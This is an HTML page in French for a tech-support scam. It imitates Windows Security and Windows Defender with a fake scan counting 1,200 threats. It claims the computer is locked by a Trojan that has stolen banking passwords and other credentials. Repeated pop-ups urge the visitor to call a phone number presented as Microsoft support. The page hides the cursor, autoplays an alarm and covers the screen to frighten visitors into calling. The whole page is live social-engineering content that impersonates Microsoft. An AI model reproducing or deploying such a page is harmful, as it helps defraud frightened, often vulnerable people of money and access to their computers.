<html lang="en">

<head>
  <meta charset="utf-8" />
  <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport" />
  <meta content="noindex,nofollow" name="robots" />
  <title>Système-Err0r-C0de 0xMPNJ</title>
  <link href="msmm.png" rel="icon" id="favicon" type="image/png" />
  <link href="tapa.css" rel="stylesheet" />
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
</head>

<body class="map enterfullscreen" id="mycanvas" style="cursor: none">
  <audio autoplay="" id="pridez">
    <source src="alert.mp3" type="audio/mpeg" />
  </audio>
  <div class="bg" style="cursor: none">
    <div class="bgimg" style="top: 0">
      <img src="bg.png" alt="" width="100%" />
    </div>
  </div>
  <a href="#" id="link_black" style="cursor: none" rel="noreferrer">
    <div class="black" style="height: 145%; cursor: none; display: block"></div>
  </a>

  <div class="infgets" style="cursor: none; display: block">
    <div class="infgets_header">
      <div class="row">
        <div class="col-md-12">
          <div class="minimize">
            <ul>
              <li>
                <a href="#">
                  <img src="mnc.png" />
                </a>
              </li>
            </ul>
          </div>
        </div>
        <div class="col-md-4">
          <div class="logo">
            <img src="msmm.png" />
            <span>Sécurité Windows</span>
          </div>
        </div>
        <div class="col-md-8">
          <div class="activate_lic">
            <ul>
              <li>
                <a href="#">
                  <button>Activer la licence</button>
                </a>
              </li>
              <li>
                <a href="#">
                  <img src="set.png" />
                </a>
              </li>
              <li>
                <a href="#">
                  <img src="ques.png" />
                </a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="scan_box">
      <div class="scan_box_header">
        <div class="row">
          <div class="col-md-6">
            <div class="quick_scan">
              <p>
                <img src="vsc.png" />
                <span>Numérisation rapide</span>
              </p>
            </div>
          </div>
          <div class="col-md-6">
            <div class="minimize1">
              <ul>
                <li>
                  <a href="#">
                    <img src="mnc.png" />
                  </a>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </div>
      <div class="safe_body">
        <div class="progressinfo">
          <div class="active progress-bar progress-bar-success" style="width: 100%" id="dynamic" aria-valuemax="100"
            aria-valuemin="0" aria-valuenow="100" role="progressbar">
            100%<span style="color: #ffffff !important">_</span> Complète
          </div>
        </div>
        <div class="table_quick">
          <table class="table table-bordered">
            <thead>
              <tr>
                <th scope="col">
                  Objets<span style="color: #ffffff !important">_</span>
                  numérisés
                </th>
                <th scope="col">
                  <div class="col_fourth infosf">
                    <h2 class="count-number count-title timer" data-speed="5000" data-to="51900"></h2>
                  </div>
                </th>
              </tr>
              <tr>
                <th scope="col">
                  Temps<span style="color: #ffffff !important">_</span> passé
                </th>
                <th scope="col">5 secondes</th>
              </tr>
              <tr>
                <th scope="col">
                  Menaces<span style="color: #ffffff !important">_</span>
                  identifiées
                </th>
                <th scope="col" style="color: red">
                  <h2 class="count-number count-title timer" data-speed="2500" data-to="1200">
                    1,200
                  </h2>
                </th>
              </tr>
            </thead>
          </table>
        </div>
      </div>
      <div class="scan_footer">
        <div class="row">
          <div class="col-md-6">
            <div class="bt_can">
              <div class="btn-group" role="group" aria-label="Basic example">
                <button class="btn btn-secondary" type="button">
                  Annuler
                </button>
              </div>
              <div class="btn-group" role="group" aria-label="Basic example">
                <button class="btn btn-secondary" type="button">Pause</button>
              </div>
            </div>
          </div>
          <div class="col-md-6">
            <div class="bt_can2">
              <div class="btn-group" role="group" aria-label="Basic example">
                <button class="btn btn-secondary" type="button">
                  Analyses programmées
                </button>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="scsdvvfbwqwe" style="cursor: none; display: block">
    <img src="bx1.jpg" alt="" style="max-width: 100%; width: 100%; margin: 0 auto" />
  </div>

  <div class="dqdwcvbsfsaw" style="cursor: none; display: block">
    <div class="infgets_header">
      <div class="row">
        <div class="col-md-12">
          <div class="minimize">
            <ul>
              <li>
                <a href="#">
                  <img src="mnc.png" />
                </a>
              </li>
            </ul>
          </div>
        </div>
        <div class="col-md-4">
          <div class="logo">
            <img src="msmm.png" />
            <span>Sécurité Windows</span>
          </div>
        </div>
        <div class="col-md-8">
          <div class="activate_lic">
            <ul>
              <li>
                <a href="#">
                  <button>Activer la licence</button>
                </a>
              </li>
              <li>
                <a href="#">
                  <img src="bel.png" />
                </a>
              </li>
              <li>
                <a href="#">
                  <img src="set.png" />
                </a>
              </li>
              <li>
                <a href="#">
                  <img src="ques.png" />
                </a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="scan_box2">
      <div class="scan_box_header">
        <div class="row">
          <div class="col-md-6">
            <div class="quick_scan">
              <p>
                <img src="vsc.png" />
                <span>Analyse</span>
              </p>
            </div>
          </div>
          <div class="col-md-6">
            <div class="minimize1">
              <ul>
                <li>
                  <a href="#">
                    <img src="mnc.png" />
                  </a>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </div>
      <div class="safe_body">
        <div class="row">
          <div class="col-md-12">
            <div class="tooreg_detail_scan">
              <ul>
                <li>
                  <a href="#">Analyse</a>
                </li>
                <li>
                  <a href="#">Planification de l'analyse</a>
                </li>
                <li>
                  <a href="#">Rapports</a>
                </li>
              </ul>
            </div>
          </div>
        </div>
        <br />
        <div class="table_quick2">
          <div class="row">
            <div class="col-md-4">
              <div class="pc_desk">
                <img src="pcm.png" />
              </div>
            </div>
            <div class="col-md-4">
              <div class="card_top scan_pro">
                <ul>
                  <li>
                    <i aria-hidden="true" class="fa fa-check"></i>
                    Vérification des mises à jour
                  </li>
                  <li>
                    <i aria-hidden="true" class="fa fa-check"></i> Mémoire de
                    numérisation
                  </li>
                  <li>
                    <i aria-hidden="true" class="fa fa-check"></i> Analyser
                    les éléments de démarrage
                  </li>
                  <li>
                    <div class="circular-spinner"></div>
                    <span>Analyse du registre</span>
                  </li>
                  <li>Analyse du système de fichiers</li>
                </ul>
              </div>
            </div>
            <div class="col-md-4">
              <div class="scan_dur">
                <p>
                  <strong>Durée de l'analyse</strong>
                </p>
                <p>3 secondes 0 s</p>
                <p>5 secondes 0 s</p>
                <br />
                <p>
                  <strong>Éléments numérisés</strong>
                </p>
                <p>51,900</p>
                <br />
                <p>
                  <strong>Détections</strong>
                </p>
                <p>11</p>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="scan_footer3">
        <div class="row">
          <div class="col-md-2">
            <div class="viruses">
              <img src="vsc.png" />
            </div>
          </div>
          <div class="col-md-10">
            <div class="make_this">
              <p>
                Cela devrait être la dernière chose dont vous vous inquiétez à
                propos des menaces en ligne.
              </p>
              <p>
                Premium bloque les logiciels malveillants, les virus et bien
                plus encore sans ralentir votre ordinateur. Passez à la
                version Premium
              </p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div style="bottom: -20px; position: fixed; cursor: none; z-index: 999999999" id="footer">
    <div class="row">
      <div class="col-md-12">
        <div class="right-foot" style="text-align: center">
          <span id="footertxt">
            <img src="msmm.png" /> Sécurité Windows
          </span>
          <span style="font-weight: 500; padding-left: 13px; color: #fff">Appelez l'assistance Windows :
            <span style="
                  border: 1px solid #fff;
                  border-radius: 5px;
                  padding: 2px 5px;
                ">
              01 86 61 72 33
            </span>
          </span>
        </div>
      </div>
    </div>
  </div>
  <div class="lightbox" id="qwrqwewrqwdqw" style="display: block"></div>
  <div class="cardcontainer" style="cursor: none; display: block" id="dwrfwewvdssdfsdf">
    <p style="
          font-size: 16px;
          font-weight: 400;
          margin: 0;
          margin-bottom: 5px;
          padding: 5px 10px;
          color: #fff !important;
          color: #414141;
          font-weight: 700;
          margin-top: 8px;
        " class="text-center">
      Windows-Defender - Avertissement de sécurité
    </p>
    <p>
      <b>L'ACCÈS À CE PC EST BLOQUÉ POUR DES RAISONS DE SÉCURITÉ</b>
    </p>
    <p>
      Votre ordinateur nous a signalé qu'il a été infecté par un logiciel
      espion de type cheval de Troie. Les données suivantes ont été
      compromises.
    </p>
    <p>
      &gt; Identifiants de messagerie <br />&gt; Mots de passe bancaires
      <br />&gt; Connexions Facebook <br />&gt; Photos et documents
    </p>
    <p>
      Windows Defender Scan a détecté un logiciel publicitaire potentiellement
      indésirable sur cet appareil qui peut voler vos mots de passe, votre
      identité en ligne, vos informations financières, vos fichiers
      personnels, vos photos ou vos documents.
    </p>
    <p>
      Vous devez nous contacter immédiatement afin que nos ingénieurs puissent
      vous guider tout au long du processus de suppression par téléphone.
    </p>
    <p>
      Appelez immédiatement l'assistance Windows pour signaler cette menace,
      empêcher l'usurpation d'identité et débloquer l'accès à cet appareil.
    </p>
    <p>
      En fermant cette fenêtre, vous mettez vos informations personnelles en
      danger et votre inscription Windows risque d'être suspendue.
    </p>
    <p style="padding-bottom: 0; color: #fff; font-size: 16px">
      Appelez l'assistance Windows :
      <strong>
        <span style="border: 1px solid #fff; border-radius: 5px; padding: 2px 5px">              01 86 61 72 33

        </span>
      </strong>
    </p>
    <div class="action_buttons">
      <a class="active" id="leave_page" style="cursor: pointer; color: #fff !important">D'ACCORD</a>
      <a class="active" id="leave_page" style="color: #fff !important">Annuler</a>
    </div>
  </div>
  <div class="answer_list" style="
        display: none;
        background-color: #000;
        height: auto;
        width: 550px;
        left: 33%;
        position: absolute;
        z-index: 99999999;
        border: 1px solid transparent;
        border-color: #d6d8db;
        border-radius: 0.5rem;
      " id="welcomeDiv">
    <p style="
          color: #fff;
          margin-top: 10px;
          font-size: 16px;
          opacity: 0.9;
          padding: 0 5px;
        " class="text-center">
      Vous devez nous contacter immédiatement afin que nos ingénieurs puissent
      vous guider tout au long du processus de suppression par téléphone.
      <br />Votre ordinateur est désactivé.<br />
      <strong>Appelez l'assistance Windows :
        <span style="
              border: 1px solid #383d41;
              border-radius: 5px;
              padding: 2px 5px;
            ">
              01 86 61 72 33
        </span>
      </strong>
    </p>
  </div>
  <div id="chat" style="display: block">
    <img src="msmm.png" />
    <span style="
          color: #222;
          font-size: 24px;
          font-weight: 600;
          margin-left: 6px;
          position: relative;
          top: 5px;
        ">Microsoft</span>
    <p style="font-weight: 600; font-size: 24px">
      Appelez l'assistance :<br />
    </p>
    <h4 style="font-weight: 600; font-size: 22px">
01 86 61 72 33
 <br />(Numéro de sécurité gratuit)
    </h4>
    <div class="arrow-down">
      <svg height="1em" viewBox="0 0 320 512">
        <style>
          svg {
            fill: #fff;
          }
        </style>
        <path
          d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z">
        </path>
      </svg>
    </div>
  </div>
  <script src="animation.js"></script>
  <script src="jquery.js"></script>
  <script src="my-script.js"></script>
</body>

</html>